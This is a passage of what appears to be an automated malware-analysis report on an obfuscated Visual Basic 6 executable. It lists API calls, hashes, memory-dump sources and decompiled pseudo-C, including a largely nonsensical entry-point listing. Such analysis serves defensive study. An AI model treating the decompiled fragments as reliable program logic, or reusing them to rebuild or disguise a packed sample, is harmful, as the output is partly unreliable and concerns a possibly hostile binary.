                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,000006F8), ref: 00410461
                                                        • __vbaStrCopy.MSVBVM60(00000000,00401120,00404544,000006F8), ref: 0041048F
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,000006FC), ref: 004104F3
                                                        • __vbaFreeStr.MSVBVM60(00000000,00401120,00404544,000006FC), ref: 0041050A
                                                        • __vbaStrCopy.MSVBVM60(00000000,00401120,00404544,000006FC), ref: 0041053F
                                                        • __vbaStrCopy.MSVBVM60(00000000,00401120,00404544,000006FC), ref: 0041054C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,00000700), ref: 004105BC
                                                        • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004105E2
                                                        • __vbaStrCopy.MSVBVM60(?,?,00401216), ref: 004105F2
                                                        • __vbaFreeStr.MSVBVM60(?,00000CE8,00003152,?,?,?), ref: 00410644
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,00000704,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152,?,?,?), ref: 004106C9
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152), ref: 00410707
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152), ref: 00410746
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152), ref: 0041075A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,00000708,?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A), ref: 004107C8
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00002F2D,00000C2A,?,?,00000CE8,00003152), ref: 004107DF
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404544,0000070C,?,?,000F5AA2), ref: 0041082A
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,?,?,000F5AA2,?,?,?,?,?,?,?,?,?,?,00002F2D), ref: 00410851
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004046FC,00000014,?,?,000F5AA2), ref: 004108B3
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004048C0,00000078,?,?,000F5AA2), ref: 00410909
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,000F5AA2,?,?,?,?,?,?,?,?,?,?,00002F2D), ref: 00410928
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401120,00404514,000001BC,?,?,?,?,000F5AA2), ref: 00410961
                                                        • __vbaFreeVar.MSVBVM60(004109C2,?,?,?,?,000F5AA2), ref: 004109BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                         • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                         • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: __vba$CheckHresult$Free$Copy$New2$#584CallCastChkstkLateList
                                                        • String ID: d$<#A$<#A$EAWheWO9mwsnBodahuVmXN5KoZmHu473$I20$JBhDOdbStjQgpp1CZ1sII6Bi6Mrw22$Mnbd91g4szlScb9$O119$O72$VIWpK2VU9f224$XvSsEqomQo7ygk5AD1LzXEnpJHmiJWdnPM37$Z3$aBxJ1EK9Or90qp8Afn674$fBR6AW7RVexTeqW175$u5Ya74wgTUO8iTCNpzL0XAUeDHmKGZp2IrI136$yelwDMF3SOzyY2197
                                                        • API String ID: 464748651-660937135
                                                        • Opcode ID: da9ca8f2bf9868f8c770115edff007b3e1e76d552e6fa093b7134fbe8e3cc729
                                                        • Instruction ID: e17d8b8cc86cee60c052054923feb4cfec82cc9cc64e118a3be219f1e9f3270d
                                                        • Opcode Fuzzy Hash: da9ca8f2bf9868f8c770115edff007b3e1e76d552e6fa093b7134fbe8e3cc729
                                                        • Instruction Fuzzy Hash: C912D6B1900218EFEB11DFA1CD45BDDBBB8BF48304F1041AAE609BB2A1D7785A95CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 47%
                                                        			E00410E70(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				char _v44;
                                                        				char _v48;
                                                        				char _v52;
                                                        				intOrPtr _v60;
                                                        				char _v68;
                                                        				char _v84;
                                                        				intOrPtr _v108;
                                                        				char _v116;
                                                        				void* _v120;
                                                        				signed int _v124;
                                                        				intOrPtr* _v128;
                                                        				signed int _v132;
                                                        				char _v140;
                                                        				signed int _v144;
                                                        				signed int _v148;
                                                        				short _t58;
                                                        				char* _t61;
                                                        				signed int _t69;
                                                        				char* _t72;
                                                        				char* _t73;
                                                        				signed int _t76;
                                                        				intOrPtr _t88;
                                                        
                                                        				_push(0x401216);
                                                        				_push( *[fs:0x0]);
                                                        				 *[fs:0x0] = _t88;
                                                        				L00401210();
                                                        				_v12 = _t88;
                                                        				_v8 = 0x4011b0;
                                                        				_push(L"01/01/");
                                                        				_push(0x404a30);
                                                        				L004012B8();
                                                        				_v60 = 0x80;
                                                        				_v68 = 8;
                                                        				_push( &_v68);
                                                        				_push( &_v84); // executed
                                                        				L004012BE(); // executed
                                                        				_v108 = 0x7d1;
                                                        				_v116 = 0x8002;
                                                        				_push( &_v84);
                                                        				_t58 =  &_v116;
                                                        				_push(_t58);
                                                        				L004012FA();
                                                        				_v120 = _t58;
                                                        				_push( &_v84);
                                                        				_push( &_v68);
                                                        				_push(2);
                                                        				L004012E2();
                                                        				_t61 = _v120;
                                                        				if(_t61 != 0) {
                                                        					_push(0);
                                                        					_push(L"afraU8zDjOaj75wVxobm84Z163");
                                                        					_push( &_v44);
                                                        					_push( &_v68);
                                                        					L00401336();
                                                        					if( *0x41233c != 0) {
                                                        						_v140 = 0x41233c;
                                                        					} else {
                                                        						_push(0x41233c);
                                                        						_push(0x40470c);
                                                        						L00401330();
                                                        						_v140 = 0x41233c;
                                                        					}
                                                        					_t19 =  &_v140; // 0x41233c
                                                        					_v120 =  *((intOrPtr*)( *_t19));
                                                        					_t69 =  *((intOrPtr*)( *_v120 + 0x1c))(_v120,  &_v48);
                                                        					asm("fclex");
                                                        					_v124 = _t69;
                                                        					if(_v124 >= 0) {
                                                        						_v144 = _v144 & 0x00000000;
                                                        					} else {
                                                        						_push(0x1c);
                                                        						_push(0x4046fc);
                                                        						_push(_v120);
                                                        						_push(_v124);
                                                        						L0040131E();
                                                        						_v144 = _t69;
                                                        					}
                                                        					_v128 = _v48;
                                                        					_v108 = 1;
                                                        					_v116 = 2;
                                                        					L00401210();
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					_t72 =  &_v68;
                                                        					L00401324();
                                                        					_t73 =  &_v52;
                                                        					L0040132A();
                                                        					_t76 =  *((intOrPtr*)( *_v128 + 0x58))(_v128, _t73, _t73, _t72, _t72, 0x4046dc, 0x10);
                                                        					asm("fclex");
                                                        					_v132 = _t76;
                                                        					if(_v132 >= 0) {
                                                        						_v148 = _v148 & 0x00000000;
                                                        					} else {
                                                        						_push(0x58);
                                                        						_push(0x404a70);
                                                        						_push(_v128);
                                                        						_push(_v132);
                                                        						L0040131E();
                                                        						_v148 = _t76;
                                                        					}
                                                        					_push( &_v48);
                                                        					_t61 =  &_v52;
                                                        					_push(_t61);
                                                        					_push(2);
                                                        					L004012B2();
                                                        					L00401312();
                                                        				}
                                                        				_push(0x411055);
                                                        				L00401312();
                                                        				return _t61;
                                                         			}


                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00410E8D
                                                        • __vbaStrCat.MSVBVM60(00404A30,01/01/,?,?,?,?,00401216), ref: 00410EA9
                                                        • #553.MSVBVM60(?,00000008,?,?,?,?,?,?,?,00404A30,01/01/,?,?,?,?,00401216), ref: 00410EC0
                                                        • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00410EDB
                                                        • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410EEE
                                                        • __vbaVarLateMemCallLd.MSVBVM60(?,?,afraU8zDjOaj75wVxobm84Z163,00000000), ref: 00410F11
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C), ref: 00410F2C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,0000001C), ref: 00410F79
                                                        • __vbaChkstk.MSVBVM60(00000000,?,004046FC,0000001C), ref: 00410FA4
                                                        • __vbaCastObjVar.MSVBVM60(?,004046DC), ref: 00410FBB
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,004046DC), ref: 00410FC5
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404A70,00000058), ref: 00410FEE
                                                        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041100C
                                                        • __vbaFreeVar.MSVBVM60 ref: 00411017
                                                        • __vbaFreeVar.MSVBVM60(00411055), ref: 0041104F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: __vba$Free$CheckChkstkHresultList$#553CallCastLateNew2
                                                        • String ID: 01/01/$<#A$afraU8zDjOaj75wVxobm84Z163
                                                        • API String ID: 1321923347-2313547846
                                                        • Opcode ID: 547cac3de27f5dcff39d1321166f0eb79b8bfe5b65176f9f3d5e02203f13a127
                                                        • Instruction ID: 210271a388282a337ab05d634464135fe5665d822b941136bec2fa3bfa165509
                                                        • Opcode Fuzzy Hash: 547cac3de27f5dcff39d1321166f0eb79b8bfe5b65176f9f3d5e02203f13a127
                                                        • Instruction Fuzzy Hash: 8E5109B1D40218AADB20EBE5CC46FDEB7B8BB08704F20416EF505B7192DBB859858F58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E00410B9B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				void* _v32;
                                                        				intOrPtr _v40;
                                                        				intOrPtr _v48;
                                                        				signed int _v52;
                                                        				void* _v64;
                                                        				signed int _v68;
                                                        				signed int _t33;
                                                        				signed int _t37;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				intOrPtr _t50;
                                                        
                                                        				_t50 = _t49 - 0xc;
                                                        				 *[fs:0x0] = _t50;
                                                        				L00401210();
                                                        				_v16 = _t50;
                                                        				_v12 = 0x401190;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x401216, _t47);
                                                        				_v40 = 0x80020004;
                                                        				_v48 = 0xa;
                                                        				_t33 = 0x10;
                                                        				L00401210();
                                                        				asm("movsd");
                                                        				asm("movsd");
                                                        				asm("movsd");
                                                        				asm("movsd");
                                                        				_push(L"IP170");
                                                        				_push(L"sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238");
                                                        				_push(L"XWy1T132"); // executed
                                                        				L004012D0(); // executed
                                                        				L004012D6();
                                                        				_push(_t33);
                                                        				_push(0);
                                                        				L004012DC();
                                                        				asm("sbb eax, eax");
                                                        				_v52 =  ~( ~( ~_t33));
                                                        				L00401306();
                                                        				_t37 = _v52;
                                                        				if(_t37 == 0) {
                                                        					L9:
                                                        					asm("wait");
                                                        					_push(0x410d0e);
                                                        					return _t37;
                                                        				} else {
                                                        					__fp0 =  *0x401188;
                                                        					_push(__ecx);
                                                        					_v64 =  *0x401188;
                                                        					__fp0 =  *0x401180;
                                                        					__fp0 =  *0x401180 *  *0x401178;
                                                        					if( *0x412000 != 0) {
                                                        						_push( *0x401174);
                                                        						_push( *0x401170);
                                                        						L00401234();
                                                        					} else {
                                                        						__fp0 = __fp0 /  *0x401170;
                                                        					}
                                                        					asm("fnstsw ax");
                                                        					if((__al & 0x0000000d) != 0) {
                                                        						goto L1;
                                                        					} else {
                                                        						_v64 = __fp0;
                                                        						__fp0 = _v64;
                                                        						 *__esp = _v64;
                                                        						__fp0 =  *0x401168;
                                                        						 *__esp =  *0x401168;
                                                        						__fp0 =  *0x401160;
                                                        						L004012CA();
                                                        						__fp0 =  *0x401158;
                                                        						 *__esp =  *0x401158;
                                                        						__fp0 =  *0x401154;
                                                        						 *__esp =  *0x401154;
                                                        						__fp0 =  *0x401150;
                                                        						 *__esp =  *0x401150;
                                                        						_a4 =  *_a4;
                                                        						__eax =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, __ecx, __ecx, __ecx, __eax, __ecx, __ecx);
                                                        						asm("fclex");
                                                        						_v52 = __eax;
                                                        						if(_v52 >= 0) {
                                                        							_v68 = _v68 & 0x00000000;
                                                        						} else {
                                                        							_push(0x2c0);
                                                        							_push(0x404514);
                                                        							_push(_a4);
                                                        							_push(_v52);
                                                        							L0040131E();
                                                        							_v68 = __eax;
                                                        						}
                                                        						goto L9;
                                                        					}
                                                        				}
                                                        				L1:
                                                        				return __imp____vbaFPException();
                                                        			}

                                                        Instruction addresses for the C-Code listing above (one entry per decompiled line, in listing order):
                                                        0x00410b9e 0x00410bad 0x00410bb7 0x00410bbf 0x00410bc2 0x00410bc9
                                                        0x00410bd8 0x00410bdb 0x00410be2 0x00410beb 0x00410bec 0x00410bf6
                                                        0x00410bf7 0x00410bf8 0x00410bf9 0x00410bfa 0x00410bff 0x00410c04
                                                        0x00410c09 0x00410c13 0x00410c18 0x00410c19 0x00410c1b 0x00410c22
                                                        0x00410c28 0x00410c2f 0x00410c34 0x00410c3a 0x00410cfc 0x00410cfc
                                                        0x00410cfd 0x00000000 0x00410c40 0x00410c40 0x00410c46 0x00410c47
                                                        0x00410c4a 0x00410c50 0x00410c5d 0x00410c67 0x00410c6d 0x00410c73
                                                        0x00410c5f 0x00410c5f 0x00410c5f 0x00410c78 0x00410c7c 0x00000000
                                                        0x00410c82 0x00410c82 0x00410c85 0x00410c89 0x00410c8c 0x00410c93
                                                        0x00410c96 0x00410c9c 0x00410ca2 0x00410ca9 0x00410cac 0x00410cb3
                                                        0x00410cb6 0x00410cbd 0x00410cc8 0x00410ccd 0x00410cd3 0x00410cd5
                                                        0x00410cdc 0x00410cf8 0x00410cde 0x00410cde 0x00410ce3 0x00410ce8
                                                        0x00410ceb 0x00410cee 0x00410cf3 0x00410cf3 0x00000000 0x00410cdc
                                                        0x00410c7c 0x0040121c 0x0040121c

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00410BB7
                                                        • __vbaChkstk.MSVBVM60 ref: 00410BEC
                                                        • #689.MSVBVM60(XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C09
                                                        • __vbaStrMove.MSVBVM60(XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C13
                                                        • __vbaStrCmp.MSVBVM60(00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C1B
                                                        • __vbaFreeStr.MSVBVM60(00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C2F
                                                        • _adj_fdiv_m64.MSVBVM60(?,00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C73
                                                        • __vbaFpI4.MSVBVM60(?,?,?,00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410C9C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401190,00404514,000002C0,?,?,?,00000000,?,?,?,00000000,00000000,XWy1T132,sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238,IP170), ref: 00410CEE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: __vba$Chkstk$#689CheckFreeHresultMove_adj_fdiv_m64
                                                        • String ID: IP170$XWy1T132$sY9Xfb7wjRH6PPztZMDLYwzI8iHass3238
                                                        • API String ID: 3051951794-3142893037
                                                        • Opcode ID: 01c6cef0cf10cca0a7800767d7f64d017c2e568ea6ee42981d44a40fbd97d115
                                                        • Instruction ID: 6dea7651b902a0e47c7f532819939087948e8a2b2081fa1fac94f24ad7662227
                                                        • Opcode Fuzzy Hash: 01c6cef0cf10cca0a7800767d7f64d017c2e568ea6ee42981d44a40fbd97d115
                                                        • Instruction Fuzzy Hash: 21415E70950208EFDB05AFA1ED49BAE7BB4FB08740F01456AF641BA1F0D7794494CB5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 72%
                                                        			E00410AA5(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				void* _v28;
                                                        				char _v44;
                                                        				signed int _v68;
                                                        				char _v76;
                                                        				short _v80;
                                                        				short _t32;
                                                        				char* _t33;
                                                        				void* _t44;
                                                        				void* _t46;
                                                        				intOrPtr _t47;
                                                        
                                                        				_t47 = _t46 - 0xc;
                                                        				 *[fs:0x0] = _t47;
                                                        				L00401210();
                                                        				_v16 = _t47;
                                                        				_v12 = 0x401140;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401216, _t44);
                                                        				L0040130C();
                                                        				_push(L"vD20d9OT8VdPbuDq42AYuNvWBBRLITtO180");
                                                        				_push(L"CJnpAGccH2dZYALc9169");
                                                        				_push( &_v44); // executed
                                                        				L004012F4(); // executed
                                                        				_v68 = _v68 & 0x00000000;
                                                        				_v76 = 0x8008;
                                                        				_push( &_v44);
                                                        				_t32 =  &_v76;
                                                        				_push(_t32);
                                                        				L004012FA();
                                                        				_v80 = _t32;
                                                        				L00401312();
                                                        				_t33 = _v80;
                                                        				if(_t33 != 0) {
                                                        					_v68 = L"zbHHUUvyVtdpA2cOBtzUSeNU2110";
                                                        					_v76 = 8;
                                                        					L004012E8();
                                                        					_t33 =  &_v44;
                                                        					_push(_t33);
                                                        					L004012EE();
                                                        					L00401312();
                                                        				}
                                                        				_push(0x410b7c);
                                                        				L00401306();
                                                        				return _t33;
                                                        			}

                                                        Instruction addresses for the C-Code listing above (one entry per decompiled line, in listing order):
                                                        0x00410aa8 0x00410ab7 0x00410ac1 0x00410ac9 0x00410acc 0x00410ad3
                                                        0x00410ae2 0x00410aeb 0x00410af0 0x00410af5 0x00410afd 0x00410afe
                                                        0x00410b03 0x00410b07 0x00410b11 0x00410b12 0x00410b15 0x00410b16
                                                        0x00410b1b 0x00410b22 0x00410b27 0x00410b2d 0x00410b2f 0x00410b36
                                                        0x00410b43 0x00410b48 0x00410b4b 0x00410b4c 0x00410b54 0x00410b54
                                                        0x00410b59 0x00410b76 0x00410b7b

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00410AC1
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 00410AEB
                                                        • #692.MSVBVM60(?,CJnpAGccH2dZYALc9169,vD20d9OT8VdPbuDq42AYuNvWBBRLITtO180,?,?,?,?,00401216), ref: 00410AFE
                                                        • __vbaVarTstNe.MSVBVM60(00008008,?), ref: 00410B16
                                                        • __vbaFreeVar.MSVBVM60(00008008,?), ref: 00410B22
                                                        • __vbaVarDup.MSVBVM60(00008008,?), ref: 00410B43
                                                        • #529.MSVBVM60(?,00008008,?), ref: 00410B4C
                                                        • __vbaFreeVar.MSVBVM60(?,00008008,?), ref: 00410B54
                                                        • __vbaFreeStr.MSVBVM60(00410B7C,00008008,?), ref: 00410B76
                                                        Strings
                                                        • vD20d9OT8VdPbuDq42AYuNvWBBRLITtO180, xrefs: 00410AF0
                                                        • CJnpAGccH2dZYALc9169, xrefs: 00410AF5
                                                        • zbHHUUvyVtdpA2cOBtzUSeNU2110, xrefs: 00410B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: __vba$Free$#529#692ChkstkCopy
                                                        • String ID: CJnpAGccH2dZYALc9169$vD20d9OT8VdPbuDq42AYuNvWBBRLITtO180$zbHHUUvyVtdpA2cOBtzUSeNU2110
                                                        • API String ID: 1647388376-3082981333
                                                        • Opcode ID: d59363b6bab7442fc89cb186633c596bd0c8fe68d1b4a09460bad3861067cdd5
                                                        • Instruction ID: 572c67f752b8977b4d9366f6d04c42286d1053683d4f06e0b693a95853544fe4
                                                        • Opcode Fuzzy Hash: d59363b6bab7442fc89cb186633c596bd0c8fe68d1b4a09460bad3861067cdd5
                                                        • Instruction Fuzzy Hash: 6411CC719002089BDB00EFD1C856BDEBBB8BF48718F54857EE501B71A1DB78958ACB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: 0={,
                                                        • API String ID: 1029625771-63937952
                                                        • Opcode ID: 1c36facfde1594bb22de901943bba2db3143677674557a431106ca83ced0a2b1
                                                        • Instruction ID: ea9daba634862822dabad3aada6543972b1e0ac6c04354f251d7922e4dfb06a4
                                                        • Opcode Fuzzy Hash: 1c36facfde1594bb22de901943bba2db3143677674557a431106ca83ced0a2b1
                                                        • Instruction Fuzzy Hash: E691C1B0A1920ACBDF22AE34C5A17EE776FAF57740F90411ADC424B646DB34C886CF52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 22%
                                                        			_entry_() {
                                                        				signed char _t49;
                                                        				intOrPtr* _t50;
                                                        				signed int _t51;
                                                        				signed int _t55;
                                                        				signed char _t61;
                                                        				signed char _t62;
                                                        				signed int _t63;
                                                        				signed char _t70;
                                                        				intOrPtr* _t85;
                                                        				intOrPtr _t87;
                                                        				signed int _t89;
                                                        				signed int _t90;
                                                        				signed int _t92;
                                                        				void* _t93;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				intOrPtr _t103;
                                                        
                                                        				_push("VB5!6&*"); // executed
                                                        				L0040135A(); // executed
                                                        				 *_t49 =  *_t49 + _t49;
                                                        				 *_t49 =  *_t49 + _t49;
                                                        				 *_t49 =  *_t49 + _t49;
                                                        				 *_t49 =  *_t49 ^ _t49;
                                                        				 *_t49 =  *_t49 + _t49;
                                                        				_t50 = _t49 + 1;
                                                        				 *_t50 =  *_t50 + _t50;
                                                        				 *_t50 =  *_t50 + _t50;
                                                        				 *_t50 =  *_t50 + _t50;
                                                        				asm("fdivrp st2, st0");
                                                        				_t51 = _t50 - 0x94;
                                                        				asm("insd");
                                                        				asm("lahf");
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 & _t51;
                                                        				 *_t51 =  *_t51 & _t51;
                                                        				 *_t51 =  *_t51 & _t51;
                                                        				asm("outsd");
                                                        				asm("outsb");
                                                        				asm("popad");
                                                        				asm("insb");
                                                        				 *((intOrPtr*)(_t90 + 0x75)) =  *((intOrPtr*)(_t90 + 0x75)) + _t51;
                                                        				asm("insb");
                                                        				asm("outsb");
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				 *_t51 =  *_t51 + _t51;
                                                        				_t98 = _t93 + 1 - 1;
                                                        				 *_t51 =  *_t51 ^ _t51;
                                                        				 *((intOrPtr*)(_t51 + 0x72bb315a)) =  *((intOrPtr*)(_t51 + 0x72bb315a)) + _t98;
                                                        				asm("int 0x73");
                                                        				_t99 = _t98 - 1;
                                                        				asm("repe cli");
                                                        				 *0x56B47A60 =  *0x56B47A60 & 0x00000003;
                                                        				_t76 = 0xfd68146;
                                                        				_push(_t99);
                                                        				asm("enter 0x4848, 0xa1");
                                                        				_t8 = _t87 + 0x3ad0135d;
                                                        				 *_t8 = _t87;
                                                        				_t89 =  *_t8 - 1;
                                                        				asm("lodsd");
                                                        				asm("stosb");
                                                        				 *0xFFFFFFFFFFFFFFFE =  *((intOrPtr*)(0xfffffffffffffffe)) + 0xde;
                                                        				_t55 = 0x000000cc ^  *0xFFFFFFFFC6E850AD;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				_t57 = _t55 - 0x00000001 & 0x25100000;
                                                        				 *_t57 =  *_t57 + 0x2b;
                                                        				 *0x6f635300 =  *0x6f635300 + 0xfd68146;
                                                        				_t103 =  *0x6f635300;
                                                        				if(_t103 < 0) {
                                                        					L3:
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t85;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t76 =  *_t76 + _t57;
                                                        					 *((intOrPtr*)(_t57 + _t57)) =  *((intOrPtr*)(_t57 + _t57)) + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					L4:
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *((intOrPtr*)(_t57 + 0x800000)) =  *((intOrPtr*)(_t57 + 0x800000)) + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *((char*)(_t57 + 0x8000)) =  *((char*)(_t57 + 0x8000));
                                                        					 *_t57 =  *_t57 + 0x80;
                                                        					 *((intOrPtr*)(_t57 - 0x7fffff80)) =  *((intOrPtr*)(_t57 - 0x7fffff80)) + _t57;
                                                        					 *((char*)(_t57 - 0x3f3f4000)) =  *((char*)(_t57 - 0x3f3f4000));
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					_t70 = 0xac;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					asm("invalid");
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					asm("invalid");
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
